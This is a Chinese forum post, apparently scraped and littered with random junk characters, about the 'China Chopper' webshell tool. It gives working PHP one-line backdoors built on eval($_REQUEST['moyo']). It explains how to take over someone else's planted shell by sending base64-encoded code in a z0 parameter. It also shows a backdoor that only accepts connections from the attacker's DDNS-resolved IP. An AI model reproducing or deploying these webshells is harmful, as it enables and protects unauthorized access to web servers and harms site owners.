今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞 o; M0 c! [: \% c4 Z9 Q
% T& a: w; C3 y+ \就算你设置了密码,使用了eval($_REQUEST['moyo']);
1 A0 {6 ~1 @ D% w( ^5 F/ w6 O; V1 a/ M x
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
' A4 O3 z1 m' B, X3 L4 B! d0 E/ p1 X6 s7 V& r! d# H v
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
* n# `) g& p! m9 X" P
! _; @5 Z7 q/ _. Z直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
5 `5 `4 ~5 m! |% e
5 M& V* z5 r8 I/ g; g0 F不知道是设计缺陷还是故意留的后门
/ z/ g- r; a! {8 F7 _
$ O0 T/ J1 { R( l2 v; g* Q' c如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
: L& J. X9 s- G% P* I, j: ]
7 [. g; J' S' g; I; K# F2 J本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
3 n% Y$ B& R4 a ~* k: I: K9 [! L8 L; \, t7 r% E4 t2 }
然后一句话后门这样写
& C8 u# H! e" O7 H) u$ Z% E' v6 K8 D# j3 k4 Z
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
6 U5 x& y0 }$ E8 Z* B这样就可以让一句话后门只允许自己的电脑连接了 L* ^+ M% g# x, g
. K1 U5 l( t1 W5 a r9 C$ u |